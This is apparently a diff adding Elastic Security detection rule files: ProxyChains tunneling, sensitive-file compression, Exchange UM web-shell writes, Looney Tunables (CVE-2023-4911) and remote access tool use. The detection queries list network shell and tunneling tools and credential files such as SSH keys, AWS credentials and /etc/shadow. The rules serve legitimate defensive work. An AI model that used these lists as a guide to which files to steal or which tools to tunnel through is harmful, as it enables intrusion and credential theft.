pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- ProxyChains Activity - 4b868f1f-15ff-4ba3-8c11-d5a7a6356d37\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses this utility for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"proxychains\" and process.args : (\n \"ssh\", \"sshd\", \"sshuttle\", \"socat\", \"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\",\n \"ssf\", \"3proxy\", \"ngrok\", \"gost\", \"pivotnacci\", \"chisel*\", \"nmap\", \"ping\", \"python*\", \"php*\", \"perl\", \"ruby\",\n \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\", \"ftp\", \"curl\", \"wget\"\n)\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "6ace94ba-f02c-4d55-9f53-87d99b6f9af4", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "6ace94ba-f02c-4d55-9f53-87d99b6f9af4_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_208.json b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_208.json new file mode 100644 index 00000000000..7cea2ad4b50 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6b84d470-9036-4cc0-a27c-6d90bbfe81ab_208.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Sensitive Files Compression", + "new_terms_fields": [ + "host.id", + "process.command_line", + "process.parent.executable" + ], + "query": "event.category:process and host.os.type:linux and event.type:start and\n process.name:(zip or tar or gzip or hdiutil or 7z) and\n process.args:\n (\n /root/.ssh/id_rsa or\n /root/.ssh/id_rsa.pub or\n /root/.ssh/id_ed25519 or\n /root/.ssh/id_ed25519.pub or\n /root/.ssh/authorized_keys or\n /root/.ssh/authorized_keys2 or\n /root/.ssh/known_hosts or\n /root/.bash_history or\n /etc/hosts or\n /home/*/.ssh/id_rsa or\n /home/*/.ssh/id_rsa.pub or\n /home/*/.ssh/id_ed25519 or\n /home/*/.ssh/id_ed25519.pub or\n /home/*/.ssh/authorized_keys or\n /home/*/.ssh/authorized_keys2 or\n /home/*/.ssh/known_hosts or\n /home/*/.bash_history or\n /root/.aws/credentials or\n /root/.aws/config or\n /home/*/.aws/credentials or\n /home/*/.aws/config or\n /root/.docker/config.json or\n /home/*/.docker/config.json or\n /etc/group or\n /etc/passwd or\n /etc/shadow or\n /etc/gshadow\n )\n", + "references": [ + "https://www.trendmicro.com/en_ca/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6b84d470-9036-4cc0-a27c-6d90bbfe81ab", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.001", + "name": "Credentials In Files", + "reference": "https://attack.mitre.org/techniques/T1552/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1560", + "name": "Archive Collected Data", + "reference": "https://attack.mitre.org/techniques/T1560/", + "subtechnique": [ + { + "id": "T1560.001", + "name": "Archive via Utility", + "reference": "https://attack.mitre.org/techniques/T1560/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 208 + }, + "id": "6b84d470-9036-4cc0-a27c-6d90bbfe81ab_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_107.json b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_107.json new file mode 100644 index 00000000000..83286145ff7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_107.json @@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies suspicious files being written by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26858.", + "false_positives": [ + "Files generated during installation will generate a lot of noise, so the rule should only be enabled after the fact.", + "This rule was tuned using the following baseline: https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/Baselines/baseline_15.2.792.5.csv from Microsoft. Depending on version, consult https://github.com/microsoft/CSS-Exchange/tree/main/Security/Baselines to help determine normalcy." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Exchange Server UM Writing Suspicious Files", + "note": "## Triage and analysis\n\nPositive hits can be checked against the established Microsoft [baselines](https://github.com/microsoft/CSS-Exchange/tree/main/Security/Baselines).\n\nMicrosoft highly recommends that the best course of action is patching, but this may not protect already compromised systems\nfrom existing intrusions. Other tools for detecting and mitigating can be found within their Exchange support\n[repository](https://github.com/microsoft/CSS-Exchange/tree/main/Security)\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : (\"UMWorkerProcess.exe\", \"umservice.exe\") and\n file.extension : (\"php\", \"jsp\", \"js\", \"aspx\", \"asmx\", \"asax\", \"cfm\", \"shtml\") and\n (\n file.path : \"?:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\*\" or\n\n (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\*\" and\n not (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\version\\\\*\" or\n file.name : (\"errorFE.aspx\", \"expiredpassword.aspx\", \"frowny.aspx\", \"GetIdToken.htm\", \"logoff.aspx\",\n \"logon.aspx\", \"OutlookCN.aspx\", \"RedirSuiteServiceProxy.aspx\", \"signout.aspx\"))) or\n\n (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\ecp\\\\auth\\\\*\" and\n not file.name : \"TimeoutLogoff.aspx\")\n )\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "6cd1779c-560f-4b68-a8f1-11009b27fe63_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_108.json b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_108.json new file mode 100644 index 00000000000..de579c531b0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6cd1779c-560f-4b68-a8f1-11009b27fe63_108.json @@ -0,0 +1,123 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies suspicious files being written by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26858.", + "false_positives": [ + "Files generated during installation will generate a lot of noise, so the rule should only be enabled after the fact.", + "This rule was tuned using the following baseline: https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/Baselines/baseline_15.2.792.5.csv from Microsoft. Depending on version, consult https://github.com/microsoft/CSS-Exchange/tree/main/Security/Baselines to help determine normalcy." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Exchange Server UM Writing Suspicious Files", + "note": "## Triage and analysis\n\nPositive hits can be checked against the established Microsoft [baselines](https://github.com/microsoft/CSS-Exchange/tree/main/Security/Baselines).\n\nMicrosoft highly recommends that the best course of action is patching, but this may not protect already compromised systems\nfrom existing intrusions. Other tools for detecting and mitigating can be found within their Exchange support\n[repository](https://github.com/microsoft/CSS-Exchange/tree/main/Security)\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : (\"UMWorkerProcess.exe\", \"umservice.exe\") and\n file.extension : (\"php\", \"jsp\", \"js\", \"aspx\", \"asmx\", \"asax\", \"cfm\", \"shtml\") and\n (\n file.path : \"?:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\*\" or\n\n (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\*\" and\n not (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\version\\\\*\" or\n file.name : (\"errorFE.aspx\", \"expiredpassword.aspx\", \"frowny.aspx\", \"GetIdToken.htm\", \"logoff.aspx\",\n \"logon.aspx\", \"OutlookCN.aspx\", \"RedirSuiteServiceProxy.aspx\", \"signout.aspx\"))) or\n\n (file.path : \"?:\\\\*\\\\Microsoft\\\\Exchange Server*\\\\FrontEnd\\\\HttpProxy\\\\ecp\\\\auth\\\\*\" and\n not file.name : \"TimeoutLogoff.aspx\")\n )\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6cd1779c-560f-4b68-a8f1-11009b27fe63", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "6cd1779c-560f-4b68-a8f1-11009b27fe63_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_4.json b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_4.json new file mode 100644 index 00000000000..d7186beba9d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_4.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects potential privilege escalation attempts through Looney Tunables (CVE-2023-4911). Looney Tunables is a buffer overflow vulnerability in GNU C Library's dynamic loader's processing of the GLIBC_TUNABLES environment variable.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via CVE-2023-4911", + "query": "sequence by host.id, process.parent.entity_id, process.executable with maxspan=5s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.env_vars : \"*GLIBC_TUNABLES=glibc.*=glibc.*=*\"] with runs=5\n", + "references": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2023/10/03/cve-2023-4911-looney-tunables-local-privilege-escalation-in-the-glibcs-ld-so" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.env_vars", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "6d8685a1-94fa-4ef7-83de-59302e7c4ca8", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\nElastic Defend integration does not collect environment variable logging by default.\nIn order to capture this behavior, this rule requires a specific configuration option set within the advanced settings of the Elastic Defend integration.\n #### To set up environment variable capture for an Elastic Agent policy:\n- Go to \u201cSecurity \u2192 Manage \u2192 Policies\u201d.\n- Select an \u201cElastic Agent policy\u201d.\n- Click \u201cShow advanced settings\u201d.\n- Scroll down or search for \u201clinux.advanced.capture_env_vars\u201d.\n- Enter the names of environment variables you want to capture, separated by commas.\n- For this rule the linux.advanced.capture_env_vars variable should be set to \"GLIBC_TUNABLES\".\n- Click \u201cSave\u201d.\nAfter saving the integration change, the Elastic Agents running this policy will be updated and the rule will function properly.\nFor more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 4 + }, + "id": "6d8685a1-94fa-4ef7-83de-59302e7c4ca8_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_5.json b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_5.json new file mode 100644 index 00000000000..5d05aac68c6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_5.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may install legitimate remote access tools (RAT) to compromised endpoints for further command-and-control (C2). Adversaries can rely on installed RATs for persistence, execution of native commands and more. This rule detects when a process is started whose name or code signature resembles commonly abused RATs. This is a New Terms rule type indicating the host has not seen this RAT process started before within the last 30 days.", + "from": "now-9m", + "history_window_start": "now-15d", + "index": [ + "logs-endpoint.events.process-*", + "endgame-*", + "winlogbeat-*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Seen Commonly Abused Remote Access Tool Execution", + "new_terms_fields": [ + "host.id" + ], + "note": "## Triage and analysis\n\n### Investigating First Time Seen Commonly Abused Remote Access Tool Execution\n\nRemote access software is a class of tools commonly used by IT departments to provide support by connecting securely to users' computers. Remote access is an ever-growing market where new companies constantly offer new ways of quickly accessing remote systems.\n\nAt the same pace as IT departments adopt these tools, the attackers also adopt them as part of their workflow to connect into an interactive session, maintain access with legitimate software as a persistence mechanism, drop malicious software, etc.\n\nThis rule detects when a remote access tool is seen in the environment for the first time in the last 15 days, enabling analysts to investigate and enforce the correct usage of such tools.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check if the execution of the remote access tool is approved by the organization's IT department.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n - If the tool is not approved for use in the organization, the employee could have been tricked into installing it and providing access to a malicious third party. Investigate whether this third party could be attempting to scam the end-user or gain access to the environment through social engineering.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- If an authorized support person or administrator used the tool 